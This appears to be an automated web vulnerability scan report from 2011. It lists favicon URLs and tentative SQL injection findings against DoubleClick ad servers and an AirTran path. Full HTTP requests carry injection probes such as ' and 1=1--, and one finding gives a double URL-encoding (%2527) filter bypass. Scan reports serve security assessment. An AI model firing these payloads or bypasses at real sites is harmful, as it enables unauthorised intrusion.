27.34. http://www.cabelas.com/favicon.ico

27.35. http://www.caringbridge.org/favicon.ico

27.36. http://www.cbc.ca/favicon.ico

27.37. http://www.celebrity-gossip.net/favicon.ico

27.38. http://www.census.gov/favicon.ico

27.39. http://www.chilisemailclub.com/favicon.ico

27.40. http://www.chuckecheese.com/favicon.ico

27.41. http://www.cincinnati.com/favicon.ico

27.42. http://www.city-data.com/favicon.ico

27.43. http://www.clocklink.com/favicon.ico

27.44. http://www.clubpenguin.com/favicon.ico

27.45. http://www.cnsnews.com/favicon.ico

27.46. http://www.collegeboard.com/favicon.ico

27.47. http://www.collegeconfidential.com/favicon.ico

27.48. http://www.comedycentral.com/favicon.ico

27.49. http://www.complaintsboard.com/favicon.ico

27.50. http://www.contactmusic.com/favicon.ico

27.51. http://www.craigslist.ca/favicon.ico

27.52. http://www.craigslist.org/favicon.ico

27.53. http://www.craveonline.com/favicon.ico

27.54. http://www.cyberdefender.com/favicon.ico

27.55. http://www.datpiff.com/favicon.ico

27.56. http://www.denverpost.com/favicon.ico

27.57. http://www.detiva.com/favicon.ico

27.58. http://www.diablomedia.com/favicon.ico

27.59. http://www.directbuyvisitorpass.com/favicon.ico

27.60. http://www.doityourself.com/favicon.ico

27.61. http://www.dreamstime.com/favicon.ico

27.62. http://www.driverside.com/favicon.ico

27.63. http://www.eatingwell.com/favicon.ico

27.64. http://www.ebaumsworld.com/favicon.ico

27.65. http://www.economist.com/favicon.ico

27.66. http://www.ed.gov/favicon.ico

27.67. http://www.egotastic.com/favicon.ico

27.68. http://www.ehealthforum.com/favicon.ico

27.69. http://www.ehow.co.uk/favicon.ico

27.70. http://www.epicurious.com/favicon.ico

27.71. http://www.epinions.com/favicon.ico

27.72. http://www.examiner.com/favicon.ico

27.73. http://www.ezanga.com/favicon.ico

27.74. http://www.familybuilder.com/favicon.ico

27.75. http://www.fantage.com/favicon.ico

27.76. http://www.faqs.org/favicon.ico

27.77. http://www.fastcompany.com/favicon.ico

27.78. http://www.fetedoris.com/favicon.ico

27.79. http://www.filestube.com/favicon.ico

27.80. http://www.findagrave.com/favicon.ico

27.81. http://www.finishline.com/favicon.ico

27.82. http://www.flixster.com/favicon.ico

27.83. http://www.food.com/favicon.ico

27.84. http://www.fortunecity.com/favicon.ico

27.85. http://www.freecause.com/favicon.ico

27.86. http://www.freeonlinegames.com/favicon.ico

27.87. http://www.freeze.com/favicon.ico

27.88. http://www.freshdeals.com/favicon.ico

27.89. http://www.funbrain.com/favicon.ico

27.90. http://www.gamehouse.com/favicon.ico

27.91. http://www.gamevance.com/favicon.ico

27.92. http://www.gamewinners.com/favicon.ico

27.93. http://www.gardenweb.com/favicon.ico

27.94. http://www.genealogy.com/favicon.ico

27.95. http://www.gossipcenter.com/favicon.ico

27.96. http://www.gourmandia.com/favicon.ico

27.97. http://www.greenwichmeantime.com/favicon.ico

27.98. http://www.harvard.edu/favicon.ico

27.99. http://www.hiexpress.com/favicon.ico

27.100. http://www.holidayinn.com/favicon.ico

27.101. http://www.hollywoodreporter.com/favicon.ico

27.102. http://www.home-remedies-for-you.com/favicon.ico

27.103. http://www.ichotelsgroup.com/favicon.ico

27.104. http://www.imagevenue.com/favicon.ico

27.105. http://www.inc.com/favicon.ico

27.106. http://www.infomash.org/favicon.ico

27.107. http://www.infowars.com/favicon.ico

27.108. http://www.ivillage.com/favicon.ico

27.109. http://www.jango.com/favicon.ico

27.110. http://www.jcwhitney.com/favicon.ico

27.111. http://www.joann.com/favicon.ico

27.112. http://www.jobsonline.net/favicon.ico

27.113. http://www.justia.com/favicon.ico

27.114. http://www.justluxe.com/favicon.ico

27.115. http://www.k12.com/favicon.ico

27.116. http://www.kazaa.com/favicon.ico

27.117. http://www.kcom.com/favicon.ico

27.118. http://www.kcom.com/favicon1.ico

27.119. http://www.kickapps.com/favicon.ico

27.120. http://www.lijit.com/favicon.ico

27.121. http://www.livevideo.com/favicon.ico

27.122. http://www.localpages.com/favicon.ico

27.123. http://www.localschooldirectory.com/favicon.ico

27.124. http://www.lowfares.com/favicon.ico

27.125. http://www.lunka.com/favicon.ico

27.126. http://www.mac.com/favicon.ico

27.127. http://www.maniatv.com/favicon.ico

27.128. http://www.mediaite.com/favicon.ico

27.129. http://www.medicalnewstoday.com/favicon.ico

27.130. http://www.mercurynews.com/favicon.ico

27.131. http://www.michigan.gov/favicon.ico

27.132. http://www.military.com/favicon.ico

27.133. http://www.miniclip.com/favicon.ico

27.134. http://www.mlive.com/favicon.ico

27.135. http://www.mochila.com/favicon.ico

27.136. http://www.music-oasis.com/favicon.ico

27.137. http://www.musiciansfriend.com/favicon.ico

27.138. http://www.myheritage.com/favicon.ico

27.139. http://www.mylifetime.com/favicon.ico

27.140. http://www.mylocalemployment.net/favicon.ico

27.141. http://www.mystart.com/favicon.ico

27.142. http://www.nationalreview.com/favicon.ico

27.143. http://www.netflix.com/favicon.ico

27.144. http://www.newgrounds.com/favicon.ico

27.145. http://www.newsdaily7.com/favicon.ico

27.146. http://www.newsok.com/favicon.ico

27.147. http://www.nextag.com/favicon.ico

27.148. http://www.northerntool.com/favicon.ico

27.149. http://www.oodle.com/favicon.ico

27.150. http://www.opportunity.co/favicon.ico

27.151. http://www.oprah.com/favicon.ico

27.152. http://www.orientaltrading.com/favicon.ico

27.153. http://www.ourstage.com/favicon.ico

27.154. http://www.ovguide.com/favicon.ico

27.155. http://www.partypoker.com/favicon.ico

27.156. http://www.payless.com/favicon.ico

27.157. http://www.pctools.com/favicon.ico

27.158. http://www.phoenix.edu/favicon.ico

27.159. http://www.phoneagentsource.com/favicon.ico

27.160. http://www.pittsburghlive.com/favicon.ico

27.161. http://www.playfin.com/favicon.ico

27.162. http://www.playstation.com/favicon.ico

27.163. http://www.playsushi.com/favicon.ico

27.164. http://www.politico.com/favicon.ico

27.165. http://www.polyvore.com/favicon.ico

27.166. http://www.popsugar.com/favicon.ico

27.167. http://www.poptropica.com/favicon.ico

27.168. http://www.potterybarn.com/favicon.ico

27.169. http://www.prlog.org/favicon.ico

27.170. http://www.pronto.com/favicon.ico

27.171. http://www.qualityhealth.com/favicon.ico

27.172. http://www.radaronline.com/favicon.ico

27.173. http://www.rawtube.com/favicon.ico

27.174. http://www.real.com/favicon.ico

27.175. http://www.rei.com/favicon.ico

27.176. http://www.rollingstone.com/favicon.ico

27.177. http://www.rottentomatoes.com/favicon.ico

27.178. http://www.rushlimbaugh.com/favicon.ico

27.179. http://www.salon.com/favicon.ico

27.180. http://www.samsung.com/favicon.ico

27.181. http://www.shutterfly.com/favicon.ico

27.182. http://www.smarter.com/favicon.ico

27.183. http://www.smugmug.com/favicon.ico

27.184. http://www.songlyrics.com/favicon.ico

27.185. http://www.sony.com/favicon.ico

27.186. http://www.space.com/favicon.ico

27.187. http://www.spanishdict.com/favicon.ico

27.188. http://www.squidoo.com/favicon.ico

27.189. http://www.staples.com/favicon.ico

27.190. http://www.suite101.com/favicon.ico

27.191. http://www.supercheats.com/favicon.ico

27.192. http://www.tagged.com/favicon.ico

27.193. http://www.takkle.com/favicon.ico

27.194. http://www.talkingpointsmemo.com/favicon.ico

27.195. http://www.techsupportforum.com/favicon.ico

27.196. http://www.thedailybeast.com/favicon.ico

27.197. http://www.thefrisky.com/favicon.ico

27.198. http://www.tinypic.com/favicon.ico

27.199. http://www.tomshardware.com/favicon.ico

27.200. http://www.toptenreviews.com/favicon.ico

27.201. http://www.trulia.com/favicon.ico

27.202. http://www.twitlonger.com/favicon.ico

27.203. http://www.umn.edu/favicon.ico

27.204. http://www.ups.com/favicon.ico

27.205. http://www.urbandictionary.com/favicon.ico

27.206. http://www.vast.com/favicon.ico

27.207. http://www.verisign.com/favicon.ico

27.208. http://www.vitals.com/favicon.ico

27.209. http://www.weather.gov/favicon.ico

27.210. http://www.webgains.com/favicon.ico

27.211. http://www.webkinz.com/favicon.ico

27.212. http://www.webring.org/favicon.ico

27.213. http://www.wired.com/favicon.ico

27.214. http://www.wnd.com/favicon.ico

27.215. http://www.woot.com/favicon.ico

27.216. http://www.worldwinner.com/favicon.ico

27.217. http://www.worthpoint.com/favicon.ico

27.218. http://www.wsbtv.com/favicon.ico

27.219. http://www.xomba.com/favicon.ico

27.220. http://www.yfrog.com/favicon.ico

27.221. http://www.yidio.com/favicon.ico

27.222. http://www.yourfilehost.com/favicon.ico

27.223. http://www.yuku.com/favicon.ico

27.224. http://www.zabasearch.com/favicon.ico

27.225. http://www.zmags.com/favicon.ico

28. Content type is not specified

28.1. http://www.4shared.com/favicon.ico

28.2. http://www.6pm.com/favicon.ico

28.3. http://www.bizrate.com/favicon.ico

28.4. http://www.blockbuster.com/favicon.ico

28.5. http://www.boldchat.com/favicon.ico

28.6. http://www.bookrags.com/favicon.ico

28.7. http://www.chacha.com/favicon.ico

28.8. http://www.dailymail.co.uk/favicon.ico

28.9. http://www.dominos.com/favicon.ico

28.10. http://www.gap.com/favicon.ico

28.11. http://www.hi5.com/favicon.ico

28.12. http://www.hotwire.com/favicon.ico

28.13. http://www.instructables.com/favicon.ico

28.14. http://www.jstor.org/favicon.ico

28.15. http://www.medcohealth.com/favicon.ico

28.16. http://www.mynewplace.com/favicon.ico

28.17. http://www.officedepot.com/favicon.ico

28.18. http://www.outbrain.com/favicon.ico

28.19. http://www.pogo.com/favicon.ico

28.20. http://www.retrevo.com/favicon.ico

28.21. http://www.rightathome.com/favicon.ico

28.22. http://www.savings.com/favicon.ico

28.23. http://www.shopzilla.com/favicon.ico

28.24. http://www.techbargains.com/favicon.ico

28.25. http://www.tracfone.com/favicon.ico

28.26. http://www.va.gov/favicon.ico

28.27. http://www.webs.com/favicon.ico

28.28. http://www.zappos.com/favicon.ico

29. SSL certificate



1. SQL injection
There are 12 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The adurl parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the adurl parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:36 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7132

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:22 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/cisco_webex_Together_AllText_728x90_r1.swf";
var gif = "http://s0.2mdn.net/2830766/cisco_webex_Hard-hit_AllText_728x90_r1.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrac
...[SNIP]...

Request 2

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:37 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7144

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jan 31 10:15:05 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.swf";
var gif = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.html%3FTrackID%3D1024051");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.htm
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The shv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the shv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
G1sL2Nyb3NzLXNpdGUtc2NyaXB0aW5nLXhzcy53d3cuY291cmNoZXZlbC5jb20uaHRtbKkCbbz1yg4Luz6oAwHIAxfoA6YD6AMf9QMAAADE&num=3&sig=AGiWqtxUeEkInJc9e-CqdzhYewXj-HfsJw&client=ca-pub-4063878933780912&adurl=http://www.exceptionalski.co.uk" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="www.exceptionalski.co.uk">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4641

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.airtran.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx
Content-Type: text/html; charset=utf-8
Content-Length: 184
Cache-Control: private, max-age=548
Expires: Sat, 02 Apr 2011 14:12:54 GMT
Date: Sat, 02 Apr 2011 14:03:46 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx'>here</a>.</h2>
</body></html>

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=600
Expires: Sat, 02 Apr 2011 14:13:47 GMT
Date: Sat, 02 Apr 2011 14:03:47 GMT
Content-Length: 10394
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
